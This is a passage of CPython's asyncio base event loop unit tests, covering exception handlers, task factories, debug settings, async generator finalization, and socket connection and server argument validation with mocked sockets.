self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = self.loop.create_future()
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
        # run_forever() consumes the KeyboardInterrupt and so does not log
        # a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
        # it's a de facto standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
with self.assertWarns(DeprecationWarning):
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if not support.IPV6_ENABLED:
return
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(support.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
